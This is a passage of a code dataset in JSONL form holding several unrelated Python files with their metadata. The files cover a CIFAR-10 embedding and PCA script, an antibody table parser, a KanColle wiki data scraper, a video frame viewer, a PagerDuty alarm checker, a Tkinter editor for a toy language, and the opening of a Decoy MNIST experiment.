super(CIFAR10, self).__init__()\r\n self.features = nn.Sequential(\r\n nn.Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(256, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False))\r\n\r\n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\r\n\r\n self.classifier_1 = nn.Linear(in_features=25088, out_features=4096, bias=True)\r\n self.classifier_2 = nn.Linear(in_features=4096, out_features=4096, bias=True)\r\n self.classifier_3 = nn.Linear(in_features=4096, out_features=10, bias=True)\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = self.avgpool(x)\r\n x = torch.flatten(x, 1)\r\n\r\n x = self.classifier_1(x)\r\n x = F.relu(x, inplace=True)\r\n x = F.dropout(x, p=0.5, inplace=False)\r\n x = self.classifier_2(x)\r\n x = F.relu(x, inplace=True)\r\n x = F.dropout(x, p=0.5, inplace=False)\r\n x = self.classifier_3(x)\r\n return x\r\n\r\n def get_embedding(self, x):\r\n x = self.features(x)\r\n x = self.avgpool(x)\r\n x = torch.flatten(x, 1)\r\n\r\n x = self.classifier_1(x)\r\n x = F.relu(x, inplace=True)\r\n x = F.dropout(x, p=0.5, inplace=False)\r\n x = self.classifier_2(x)\r\n return x\r\n\r\n\r\ndef setup_seed(seed):\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n np.random.seed(seed)\r\n random.seed(seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\nsetup_seed(24)\r\n\r\nmodel = torch.load('/home/tdye/EMD/model.pt').cuda()\r\n\r\ntransform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.5, 0.5, 0.5],\r\n std=[0.5, 0.5, 0.5])\r\n])\r\n\r\ntrain_data = datasets.CIFAR10(root='./data/', train=True, transform=transform, download=True)\r\ntest_data = datasets.CIFAR10(root='./data/', train=False, transform=transform, download=True)\r\ntrain_loader = torch.utils.data.DataLoader(\r\n dataset=train_data, batch_size=100, shuffle=False\r\n)\r\ntest_loader = torch.utils.data.DataLoader(\r\n dataset=test_data, batch_size=100, shuffle=False\r\n)\r\n\r\ntotal_right = 0\r\ntotal_samples = 0\r\nX = None\r\nfor i, (data, labels) in enumerate(train_loader):\r\n data = data.cuda()\r\n labels = labels.cuda()\r\n embedding = model.get_embedding(data).detach()\r\n if X is None:\r\n X = embedding\r\n else:\r\n X = torch.cat([X, embedding], dim=0)\r\n output = model(data)\r\n output = torch.argmax(output, dim=-1)\r\n total_right += torch.sum(output == labels)\r\n total_samples += len(labels)\r\nprint(f\"training, {total_right}/{total_samples}=\", float(total_right) / total_samples)\r\n\r\ntotal_right = 0\r\ntotal_samples = 0\r\nfor i, (data, labels) in enumerate(test_loader):\r\n data = data.cuda()\r\n labels = labels.cuda()\r\n embedding = model.get_embedding(data).detach()\r\n if X is None:\r\n X = embedding\r\n else:\r\n X = torch.cat([X, embedding], dim=0)\r\n output = model(data)\r\n output = torch.argmax(output, dim=-1)\r\n total_right += torch.sum(output == labels)\r\n total_samples += len(labels)\r\nprint(f\"testing, {total_right}/{total_samples}=\", float(total_right) / total_samples)\r\n\r\nX = X.detach().cpu().numpy()\r\nprint(X.shape)\r\n\r\npca = PCA(n_components=256)\r\nnewX = pca.fit_transform(X)\r\nprint(newX.shape)\r\n\r\nnp.save(\"newX\", newX)\r\n","sub_path":"cifar10/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"321756115","text":"# this will parse the output table, containing GERMline, CDR, DNA information of individual reads\nimport os\nimport IsolateClone\n\ndef ParseTable(filePath):\n\tAbDict={}\n\tkeyList=['RID','LID','DNAlen','FV-PRO','FV-DNA',\"GERMLINE-V\",'GERMLINE-D','GERMLINE-J','FR1-PRO','CDR1-PRO','FR2-PRO','CDR2-PRO',\"FR3-PRO\",'CDR3-PRO','FR4-PRO','PRO',\"DNA\",'FR1-PRO','CDR1-DNA','FR2-PRO','CDR2-DNA','FR3-DNA','CDR3-DNA','FR4-DNA','FR4-DNA']\n\n\t#print \"how many key? \" + str(len(keyList))\n\tcount_seq=0\n\tfor filename in os.listdir(filePath):\n\t\tif not filename.endswith(\"all.xls\"):\n\t\t\tcontinue\n\t\tcurrentFile=os.path.join(filePath,filename)\n\t\twith open (currentFile) as tableObject:\n\t\t\tfor line in tableObject:\t\n\t\t\t\tif line.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tcount_seq +=1\n\t\t\t\tline=line.rstrip(\"\\n\")\n\t\t\t\titem=line.split(\"\\t\")\n\n\t\t\t\t#print \"how many item?\" + str(len(item))\n\t\t\t\tAbDict[item[0]]={}\n\t\t\t\t#print item\n\t\t\t\tfor i in range(0,len(keyList)):\n\t\t\t\t\t#print AbDict[item[0]]\n\t\t\t\t\t#print keyList[i]\n\t\t\t\t\t#print item[i]\n\t\t\t\t\ttry:\n\t\t\t\t\t\tAbDict[item[0]].update({keyList[i]:item[i+1]})\n\t\t\t\t\texcept:\n\t\t\t\t\t\tAbDict[item[0]].update({keyList[i]:\"\"})\n\t\t\t\tAbDict[item[0]][\"DNA\"] = AbDict[item[0]][\"DNA\"]\n\treturn (AbDict,count_seq)\t\t\t\t\t\t\t\n\n##################\n'''\nfile=\"/dlab/NGS/usem-seqanalysis/160314_zhaiqi1_miseq_HBx52-60DNA.20160214_AN2N4/test/RESULTS\"\nAbDict=ParseTable(file)\ngroup = IsolateClone.identifyClone(AbDict)\n#print group\n#print \"Unique comibnation:\" + str(len(group))\n#print \"nubmer of individiual\" + str(len(AbDict))\n#print AbDict\n'''\n","sub_path":"ParseTable.py","file_name":"ParseTable.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"404747281","text":"import asyncio\nimport json\nimport re\n\nfrom config import (DB_PATH, JSON_PATH, KCDATA_SHIP_ALL_JSON,\n KCDATA_SLOTITEM_ALL_JSON, LUATABLE_PATH, OUPUT_PATH,\n SHINKAI_EXTRA_JSON, SHINKAI_ITEMS_DATA, SHINKAI_SHIPS_DATA,\n WIKIA_OUTPUT_JSON)\nfrom HttpClient import HttpClient\nfrom slpp import slpp as lua\nfrom utils import jsonFile2dic, luatable, sortDict\n\nLUATABLE_PATTERN = re.compile(r'{[\\s\\S]*}')\nREDIRECT_PATTERN = re.compile(r'\\[\\[(.*)\\]\\]')\n\nRANGE = {\n 0: '无', 1: '短', 2: '中', 3: '长', 4: '超长', 5: '超超长', -1: '未知'\n}\nSPEED = {\n 0: '陆上单位', 5: '低速', 10: '高速', -1: '未知'\n}\n\nATTRS = {\n '_can_debuff': '削甲'\n}\n\nSTATS = {\n '_luck': '运', '_shelling_accuracy': '命中',\n '_bombing': '爆装', '_torpedo': '雷装', '_hp': '耐久',\n '_armor': '装甲', '_aa': '对空', '_asw': '对潜',\n '_los': '索敌', '_speed': '速力', '_evasion': '回避',\n '_firepower': '火力', '_range': '射程',\n '_torpedo_accuracy': '雷击命中'\n}\nSTATS_EXTRA = {\n '_opening_torpedo': '开幕鱼雷',\n '_slots': '格数',\n '_night_bombing': '夜战轰炸',\n '_air_power': '制空值',\n '_asw_attack': '开幕反潜'\n}\nREMARKS = {\n 560: '可提供夜战连击'\n}\n\nREDIRECT = {\n '22inch Torpedo Late Model': 'High-speed Abyssal Torpedo'\n}\nSTYPE = {\n 1: '海防舰', 2: '驱逐舰', 3: '轻巡洋舰', 4: '重雷装巡洋舰', 5: '重巡洋舰',\n 6: '航空巡洋舰', 7: '轻空母', 8: '战舰', 9: '战舰', 10: '航空战舰',\n 11: '正规空母', 12: '超弩级战舰', 13: '潜水艇', 14: '潜水空母', 15: '输送舰',\n 16: '水上机母舰', 17: '扬陆舰', 18: '装甲空母', 19: '工作舰', 20: '潜水母舰',\n 21: '练习巡洋舰', 22: '补给舰'\n}\n\nSKIP_SUFFIXES = ['New Year 2017']\n\n\nclass ShinkaiLuatable(HttpClient):\n WIKIA_RAW_URL = 'http://kancolle.wikia.com/wiki/{}?action=raw'\n\n def __init__(self):\n super().__init__()\n self.items_id_map = {}\n self.items_data = {}\n self.ships_data = {}\n self.SHINKAI_EXTRA = {}\n self.SLOTITEMS_KCDATA = jsonFile2dic(DB_PATH + KCDATA_SLOTITEM_ALL_JSON, masterKey='id')\n self.SHIPS_KCDATA = jsonFile2dic(DB_PATH + KCDATA_SHIP_ALL_JSON, masterKey='id')\n\n async def __get_allitems(self):\n SHINKAI_ITEMS_URL = 'http://kancolle.wikia.com/api.php?action=query&list=categorymembers&cmtitle=Category:Enemy_equipment&cmlimit=500&format=json'\n async with self.session.get(SHINKAI_ITEMS_URL) as resp:\n res = await resp.json()\n return res['query']['categorymembers']\n\n async def __append_shinkai_item(self, title):\n resp = await self.session.get(self.WIKIA_RAW_URL.format('Module:' + title))\n item_info_text = await resp.text()\n while item_info_text.find('REDIRECT') != -1:\n title = REDIRECT_PATTERN.search(item_info_text).group(1).strip()\n resp = await self.session.get(self.WIKIA_RAW_URL.format('Module:' + title))\n item_info_text = await resp.text()\n _luatable = re.search(LUATABLE_PATTERN, item_info_text)\n if not _luatable:\n return\n _luatable = _luatable.group(0)\n item_info = lua.decode(_luatable)\n item_id = item_info['_id']\n chinese_name = self.SLOTITEMS_KCDATA[item_id]['chinese_name']\n chinese_name = chinese_name if chinese_name else ''\n self.items_data[item_id] = {\n '日文名': item_info['_japanese_name'],\n '中文名': chinese_name,\n '类型': self.SLOTITEMS_KCDATA[item_id]['type'],\n '稀有度': item_info['_rarity']\n }\n self.items_id_map[item_info['_name']] = item_id\n for key, val in item_info.items():\n if key not in STATS:\n continue\n if val == False:\n continue\n if key == '_range':\n val = RANGE[val]\n self.items_data[item_id].update({\n STATS[key]: val\n })\n if item_id in REMARKS:\n self.items_data[item_id].update({\n '备注': REMARKS[item_id]\n })\n\n async def genShinkaiItems(self):\n CATEGORY_MEMBERS = await self.__get_allitems()\n tasks = []\n for category in CATEGORY_MEMBERS:\n title = category['title']\n if title.startswith('Template'):\n continue\n tasks.append(asyncio.ensure_future(\n self.__append_shinkai_item(title)))\n dones, pendings = await asyncio.wait(tasks)\n print('Shinkai-Items: {} done, {} pendings.'.format(len(dones), len(pendings)))\n self.items_data = sortDict(self.items_data)\n items_luatable = 'local d = {}\\n'\n items_luatable += '\\nd.equipDataTable = '\n items_luatable += luatable(self.items_data)\n items_luatable += '\\n'\n items_luatable += '\\nreturn d\\n'\n with open(OUPUT_PATH + LUATABLE_PATH + SHINKAI_ITEMS_DATA + '.lua', 'w', encoding='utf-8') as fp:\n fp.write(items_luatable)\n with open(OUPUT_PATH + JSON_PATH + SHINKAI_ITEMS_DATA + '.json', 'w', encoding='utf-8') as fp:\n json.dump(self.items_data, fp, ensure_ascii=False, indent=4)\n\n async def __get_allships(self):\n ret = []\n async with self.session.get('http://kancolle.wikia.com/api.php?action=query&list=categorymembers&cmtitle=Category:Enemy_ship_modules&cmlimit=500&format=json') as resp:\n res = await resp.json()\n CATEGORY_MEMBERS = res['query']['categorymembers']\n for category in CATEGORY_MEMBERS:\n title = category['title']\n if title.startswith('Module') and title not in ret:\n ret.append(title)\n async with self.session.get('http://kancolle.wikia.com/api.php?action=query&list=categorymembers&cmtitle=Category:Enemy_boss_ship_modules&cmlimit=500&format=json') as resp:\n res = await resp.json()\n CATEGORY_MEMBERS = res['query']['categorymembers']\n for category in CATEGORY_MEMBERS:\n title = category['title']\n if title.startswith('Module') and title not in ret:\n ret.append(title)\n return ret\n\n def __load_extra(self):\n self.SHINKAI_EXTRA = jsonFile2dic(DB_PATH + SHINKAI_EXTRA_JSON)\n wikia_data = jsonFile2dic(DB_PATH + WIKIA_OUTPUT_JSON)\n for _id, value in wikia_data.items():\n if _id not in self.SHINKAI_EXTRA:\n self.SHINKAI_EXTRA[_id] = {}\n self.SHINKAI_EXTRA[_id].update(value)\n\n async def __append_shinkai_ship(self, title):\n resp = await self.session.get(self.WIKIA_RAW_URL.format(title))\n resp_text = await resp.text()\n _luatable = LUATABLE_PATTERN.search(resp_text)\n _luatable = _luatable.group(0)\n shinkai_infos = lua.decode(_luatable)\n for shinkai_info in shinkai_infos.values():\n if type(shinkai_info) is not dict:\n continue\n if '_api_id' not in shinkai_info:\n continue\n if '_suffix' in shinkai_info and shinkai_info['_suffix'] in SKIP_SUFFIXES:\n continue\n api_id = shinkai_info['_api_id']\n if api_id < 1000:\n api_id += 1000\n if api_id not in self.SHIPS_KCDATA:\n continue\n _api_id = str(api_id)\n extra_data = self.SHINKAI_EXTRA[_api_id] if _api_id in self.SHINKAI_EXTRA else {\n }\n yomi = self.SHIPS_KCDATA[api_id]['yomi']\n yomi = yomi if yomi else ''\n chinese_name = self.SHIPS_KCDATA[api_id]['chinese_name']\n chinese_name = chinese_name if chinese_name else ''\n category = ''\n stype = self.SHIPS_KCDATA[api_id]['stype']\n if 'Stype' in extra_data:\n category = extra_data['Stype']\n else:\n category = STYPE[stype]\n self.ships_data[_api_id] = {\n '日文名': shinkai_info['_japanese_name'],\n '中文名': chinese_name,\n 'kcwiki分类': category,\n '属性': {\n '耐久': 0,\n '装甲': 0,\n '火力': 0,\n '雷装': 0,\n '对潜': 0,\n '对空': 0,\n '回避': 0,\n '索敌': 0,\n '运': 0,\n '速力': \"未知\",\n '射程': \"未知\"\n },\n '装备': {}\n }\n for key, val in shinkai_info.items():\n if key == '_id' or key == '_api_id':\n continue\n if val == None or val == 0:\n continue\n if key == '_range':\n val = RANGE[val]\n elif key == '_speed':\n val = SPEED[val]\n elif key == '_equipment':\n equips = {\n '格数': len(val),\n '搭载': [],\n '装备': []\n }\n for att in val:\n equips['搭载'].append(att['size'] if att['size'] else 0)\n equip_name = att['equipment']\n equip_id = -1\n if equip_name and equip_name not in self.items_id_map:\n if equip_name in REDIRECT:\n equip_name = REDIRECT[equip_name]\n if equip_name and equip_name in self.items_id_map:\n equip_id = self.items_id_map[equip_name]\n equips['装备'].append(equip_id)\n self.ships_data[_api_id].update({\n '装备': equips\n })\n elif val == True:\n val = 1\n elif val == False:\n val = 0\n if key in STATS:\n if key == '_firepower' and\\\n (chinese_name.find('WO') != -1 or chinese_name.find('NU') != -1) and\\\n 'DayBattle' in extra_data:\n val = [val, extra_data['DayBattle']]\n self.ships_data[_api_id]['属性'][STATS[key]] = val\n elif key in ATTRS:\n self.ships_data[_api_id].update({\n ATTRS[key]: val\n })\n if (chinese_name.find('WO') != -1 or chinese_name.find('NU') != -1) and\\\n 'DayBattle' in extra_data:\n if '火力' not in self.ships_data[_api_id]['属性']:\n self.ships_data[_api_id]['属性']['火力'] = [0, extra_data['DayBattle']]\n\n async def genShinkaiShips(self):\n self.__load_extra()\n categories = await self.__get_allships()\n tasks = []\n for title in categories:\n tasks.append(asyncio.ensure_future(\n self.__append_shinkai_ship(title)))\n dones, pendings = await asyncio.wait(tasks)\n print('Shinkai-Ships: {} done, {} pendings.'.format(len(dones), len(pendings)))\n self.ships_data = sortDict(self.ships_data)\n ships_luatable = 'local d = {}\\n'\n ships_luatable += '\\nd.shipDataTable = '\n ships_luatable += luatable(self.ships_data)\n ships_luatable += '\\n'\n ships_luatable += '\\nreturn d\\n'\n with open(OUPUT_PATH + LUATABLE_PATH + SHINKAI_SHIPS_DATA + '.lua', 'w', encoding='utf-8') as fp:\n fp.write(ships_luatable)\n with open(OUPUT_PATH + JSON_PATH + SHINKAI_SHIPS_DATA + '.json', 'w', encoding='utf-8') as fp:\n json.dump(self.ships_data, fp, ensure_ascii=False, indent=4)\n\n async def start(self):\n await self.genShinkaiItems()\n await self.genShinkaiShips()\n","sub_path":"ShinkaiLuatable.py","file_name":"ShinkaiLuatable.py","file_ext":"py","file_size_in_byte":12018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"256749382","text":"import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture('line_latest1.mp4')\ncounter = 0\nif (cap.isOpened()== False): \n print(\"Error opening video stream or file\")\n\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret == True:\n cv2.imshow('Frame',frame)\n \n if cv2.waitKey(0) & 0xFF == ord('q'):\n cv2.imwrite(\"defective frame.jpg\", frame)\n break\n counter += 1\n print(counter)\n else:\n break\n \n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"play_video.py","file_name":"play_video.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"71753975","text":"'''\n\n pyger.py\n Core script, checks on pagerduty and fires the alarms if necessary.\n\n'''\n\n__Author__ = 'Chris Swanson'\n\n\nimport alarms\nimport pygerduty\nimport ConfigParser\n\n\nclass Pager(object):\n '''Pagerduty class to check for paged status.'''\n def __init__(self):\n '''Initialization function'''\n # Import configs.\n self.import_conf()\n self.pager = pygerduty.PagerDuty(self.subdomain, self.apikey)\n\n def import_conf(self):\n '''Import Configurations for Pagerduty.'''\n configs = ConfigParser.ConfigParser()\n configs.read('config.ini')\n # Pagerdutt API Key\n self.apikey = configs.get('pagerduty', 'apikey')\n # Pagerduty subdomain\n self.subdomain = configs.get('pagerduty', 'subdomain')\n # Email of user, used for validating the alarm is for you...\n self.email = configs.get('pagerduty', 'email')\n # Heartbeat / how often to hit the pagerduty API.\n self.heartbeat = int(configs.get('pagerduty', 'heartbeat'))\n\n def is_paged(self):\n '''Check PagerDuty for status.'''\n pages = self.pager.incidents.list()\n for page in pages:\n email_addr = page.to_json()['assigned_to_user']['email']\n if email_addr.lower() == self.email.lower():\n alarms.run()\n\n\ndef main():\n '''Main function.'''\n check = Pager()\n check.is_paged()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pyger.py","file_name":"pyger.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"458617002","text":"from Tkinter import *\nimport tkMessageBox\nimport time\nimport tkFileDialog\nimport os\nimport subprocess\nimport Husky_Interpreter\nfrom sys import *\n\nclass GUI(Tk):\n\tdef __init__(self, parent):\n\t\tTk.__init__(self, parent)\n\t\tself.parent=parent\n\t\tself.fclipboard=0\n\tdef mainGUI(self):\n\t\tself.geometry('1265x701+5-46')\n\t\tself.resizable(False, False)\n\t\tself.title('Husky Editor')\n\t\tself.configure(background='#2a2a2a')\n\t\tself.logo=PhotoImage(file='Husky_Logo.gif')\n\t\tself.tk.call('wm', 'iconphoto', self._w, self.logo)\n\n\t\tself.menubar=Menu(self)\n\t\tself.file=Menu(self.menubar, tearoff=0)\n\t\tself.file.add_command(label='New', command=self.newfile)\n\t\tself.file.add_command(label='Open', command=self.openfile)\n\t\tself.file.add_command(label='Save As', command=self.saveas)\n\t\tself.file.add_command(label='Save', command=self.savefile)\n\t\tself.file.add_command(label='Close', command=self.destroy)\n\t\tself.menubar.add_cascade(label='File', menu=self.file)\n\n\t\tself.edit=Menu(self.menubar, tearoff=0)\n\t\tself.edit.add_command(label='Cut', command=self.cuttext)\n\t\tself.edit.add_command(label='Copy', command=self.copytext)\n\t\tself.edit.add_command(label='Paste', command=self.pastetext)\n\t\tself.edit.add_command(label='Comment', command=self.comment)\n\t\tself.menubar.add_cascade(label='Edit', menu=self.edit)\n\n\t\tself.tools=Menu(self.menubar, tearoff=0)\n\t\tself.tools.add_command(label='Compile and Run', command=self.compilerun) #Save contents of current file and compile+run\n\t\tself.menubar.add_cascade(label='Tools', menu=self.tools)\n\n\t\tself.config(menu=self.menubar)\n\n\t\tself.texteditor=Text(self, width=87, height=48, font=('Lucida Console', '8'), bg='#272822', fg='white', insertbackground='white', spacing3=3, selectbackground='#49483e', wrap=NONE, padx=10, pady=5, tabs=25)\n\t\tself.texteditor.place(relx=0, rely=0)\n\t\tself.texteditor.bind(\"\", lambda event:self.position())\n\n\t\tself.lclabel=StringVar()\n\t\tself.linecolumn=Label(self, textvariable=self.lclabel, anchor=W, bg='#575757', fg='white', width=190, relief=FLAT)\n\t\tself.linecolumn.place(relx=0, rely=0.97)\n\n\t\tself.consoleframe=Frame(self, width=615, height=679)\n\t\tself.consoleframe.place(relx=0.499, rely=0)\n\n\t\tself.canvasforthescrollbar=Canvas(self.consoleframe, bg='#e6e6e6', width=615, height=679, highlightthickness=0, highlightbackground='black')\n\t\tself.showconsoleframe=Frame(self.canvasforthescrollbar)\n\t\tconsolescrollbar=Scrollbar(self.consoleframe, orient='vertical', command=self.canvasforthescrollbar.yview)\n\t\tself.canvasforthescrollbar.configure(yscrollcommand=consolescrollbar.set)\n\t\t\n\t\tconsolescrollbar.pack(side='right', fill='y')\n\t\tself.canvasforthescrollbar.pack(side='left')\n\t\tself.canvasforthescrollbar.create_window((0,0), window=self.showconsoleframe, anchor='nw')\n\t\tself.showconsoleframe.bind('', self.enablescrollconsole)\n\n\t\tself.startcommand()\n\tdef enablescrollconsole(self, event):\n\t\tself.canvasforthescrollbar.configure(scrollregion=self.canvasforthescrollbar.bbox('all'), width=615, height=679)\n\tdef printcommands(self, com):\n\t\tself.commandframe=Frame(self.showconsoleframe, bg='#e6e6e6')\n\t\tself.commandframe.pack()\n\t\tself.eachcom=Frame(self.commandframe)\n\t\tself.eachcom.pack(padx=8, pady=2)\n\t\tself.comnamelabel=Label(self.eachcom, text=com, fg='#575757', bg='#e6e6e6', font=('Lucida Console', '8'), width=85, anchor=W, justify=LEFT, wraplength=605)\n\t\tself.comnamelabel.pack()\n\tdef scancommand(self):\n\t\tself.scancommandframe=Frame(self.showconsoleframe, bg='#e6e6e6')\n\t\tself.scancommandframe.pack()\n\t\tself.eachscom=Frame(self.scancommandframe)\n\t\tself.eachscom.pack(padx=8, pady=2)\n\t\tself.scanVar=StringVar()\n\t\tself.comnametext=Entry(self.eachscom, textvariable=self.scanVar, fg='#e6e6e6', bg='#575757', font=('Lucida Console', '8'), width=85, insertbackground='white')\n\t\tself.comnametext.pack()\n\t\tself.comnametext.bind(\"\", self.returninput)\n\tdef returninput(self, event):\n\t\tself.comnametext.configure(state=DISABLED)\n\t\treturn self.scanVar.get()\n\tdef startcommand(self):\n\t\topening='Husky Console (Version 1.1)\\nCopyright (c) 2015 Brillantes Chua Esguerra Ongoco Torres. All rights reserved.'\n\t\tself.commandframe=Frame(self.showconsoleframe, bg='#e6e6e6')\n\t\tself.commandframe.pack()\n\t\tself.eachcom=Frame(self.commandframe)\n\t\tself.eachcom.pack(padx=8, pady=2)\n\t\tself.comnamelabel=Label(self.eachcom, text=opening, fg='#575757', bg='#e6e6e6', font=('Lucida Console', '8'), width=85, anchor=W, justify=LEFT, wraplength=605)\n\t\tself.comnamelabel.pack()\n\tdef saveas(self):\n\t\tself.fclipboard=tkFileDialog.asksaveasfile(mode='w', defaultextension='.hsk')\n\t\tif self.fclipboard is None:\n\t\t\tself.fclipboard=0\n\t\t\treturn\n\t\ttexttosave=self.texteditor.get(1.0, END)\n\t\tself.fclipboard.write(texttosave)\n\t\tself.title('Husky Editor - '+self.fclipboard.name)\n\tdef savefile(self):\n\t\tif(self.fclipboard!=0):\n\t\t\tself.fclipboard=open(str(self.fclipboard.name), 'w')\n\t\t\ttexttosave=self.texteditor.get(1.0, END)\n\t\t\tself.fclipboard.write(texttosave)\n\t\t\tself.title('Husky Editor - '+self.fclipboard.name)\n\t\telse:\n\t\t\tself.saveas()\n\tdef openfile(self):\n\t\tself.fclipboard=tkFileDialog.askopenfile(mode='r')\n\t\tif self.fclipboard is None:\n\t\t\tself.clipboard=0\n\t\t\treturn\n\t\tself.texteditor.delete(1.0, END)\n\t\tfor line in self.fclipboard:\n\t\t\tself.texteditor.insert('insert', line)\n\t\tself.title('Husky Editor - '+self.fclipboard.name)\n\tdef newfile(self):\n\t\tself.fclipboard=0\n\t\tself.texteditor.delete(1.0, END)\n\t\tself.title('Husky Editor')\n\tdef copytext(self):\n\t\ttry:\n\t\t\ttexttocopy=self.texteditor.get('sel.first', 'sel.last')\n\t\t\tself.clipboard_clear() \n\t\t\tself.clipboard_append(texttocopy)\n\t\texcept TclError:\n\t\t\ttkMessageBox.showerror('Copy Error', 'Highlight text to copy.')\n\tdef cuttext(self):\n\t\ttry:\n\t\t\ttexttocut=self.texteditor.get('sel.first', 'sel.last') \n\t\t\tself.texteditor.delete('sel.first', 'sel.last') \n\t\t\tself.clipboard_clear() \n\t\t\tself.clipboard_append(texttocut)\n\t\texcept TclError:\n\t\t\ttkMessageBox.showerror('Cut Error', 'Highlight text to cut.') \n\tdef pastetext(self):\n\t\ttexttopaste=self.selection_get(selection='CLIPBOARD')\n\t\tself.texteditor.insert('insert', texttopaste)\n\tdef comment(self):\n\t\ttry:\n\t\t\tfirst=self.texteditor.index('sel.first').split('.')\n\t\t\tlast=self.texteditor.index('sel.last').split('.')\n\t\t\tif(int(first[0])==int(last[0])):\n\t\t\t\tself.texteditor.insert('sel.first', ';')\n\t\t\telse:\n\t\t\t\tfor i in range(int(first[0]), int(last[0])+1):\n\t\t\t\t\tif(i==int(first[0])):\n\t\t\t\t\t\tindex=str(i)+'.'+str(first[1])\n\t\t\t\t\telse:\n\t\t\t\t\t\tindex=str(i)+'.0'\n\t\t\t\t\tself.texteditor.insert(index, ';')\n\t\texcept TclError:\n\t\t\ttkMessageBox.showerror('Comment Error', 'Highlight text to comment or just type \\';\\' to begin comment.')\n\tdef position(self):\n\t\tline=self.texteditor.index('insert').split('.')\n\t\tstring=\"Line: \"+str(line[0])+\", \"+\"Column: \"+str(int(line[1])+1)\n\t\tself.lclabel.set(string)\n\tdef compilerun(self):\n\t\tif(self.fclipboard!=0):\n\t\t\tself.fclipboard=open(str(self.fclipboard.name), 'w')\n\t\t\ttexttosave=self.texteditor.get(1.0, END)\n\t\t\tself.fclipboard.write(texttosave)\n\t\t\tself.fclipboard.close()\n\t\t\tif(self.fclipboard.name.find(\" \")!=-1):\n\t\t\t\tself.name=self.fclipboard.name[:self.fclipboard.name.find(\" \")]+\"\\\" \\\"\"+self.fclipboard.name[(self.fclipboard.name.find(\" \")+1):]\n\t\t\telse:\n\t\t\t\tself.name=self.fclipboard.name\n\t\t\tcompilestring=\"python Husky_MP.py \"+str(self.name)\n\t\t\tos.system(compilestring)\n\t\t\t#self.a = os.popen(compilestring).read()\n\t\telse:\n\t\t\ttkMessageBox.showerror('Compile Error','Save your file first before compiling.')\n\tdef return_filename(self):\n\t\treturn self.name\n\t#def return_string(self):\n\t#\tself.printcommands(self.a)\n\t#\treturn self.a \ng=GUI(None)\ng.mainGUI()\ng.mainloop()","sub_path":"Husky_GUI.py","file_name":"Husky_GUI.py","file_ext":"py","file_size_in_byte":7614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"606080971","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\ntry:\n from io import BytesIO\nexcept ImportError:\n import cStringIO\n\nimport array\nimport base64\nimport gzip\nimport json\nimport os\nimport pickle\nimport random\nimport struct\nimport time\n\nfrom celery import Celery\n\nfrom PIL import Image\n\nimport autograd.numpy as np\nimport autograd.numpy.random as npr\n\nimport matplotlib.pyplot as plt\n\ntry:\n from urllib.request import urlretrieve\nexcept ImportError:\n from urllib2 import urlopen\n\nfrom lime import lime_image\nfrom skimage.segmentation import mark_boundaries\n\nfrom rfft.experiment import Dataset\nfrom rfft.experiment import Experiment\nfrom rfft.experiment import ExperimentType\n\nfrom rfft.hypothesis import Hypothesis\nfrom rfft.multilayer_perceptron import MultilayerPerceptron\nfrom rfft.local_linear_explanation import explanation_grid\n\n\nANNOTATIONS_DIR = 'tagging/decoy_mnist'\n\n\nclass DecoyMNIST(Experiment):\n\n MODELS_DIR = 'models/decoy_mnist'\n SAVED_EXPERIMENTS_CACHE_FILE = 'saved_experiments_metadata'\n\n def __init__(self):\n Experiment.__init__(self)\n self.annotation_idxs = []\n\n def get_status(self):\n return self.status\n\n def domain(self):\n return ExperimentType.IMAGE\n\n def pretty_name(self):\n return 'Decoy MNIST'\n\n def description(self):\n return 'Handwritten digits'\n\n def generate_dataset(self, cachefile='data/decoy-mnist.npz'):\n if cachefile and os.path.exists(cachefile):\n cache = np.load(cachefile)\n data = tuple([cache[f] for f in sorted(cache.files)])\n else:\n data = 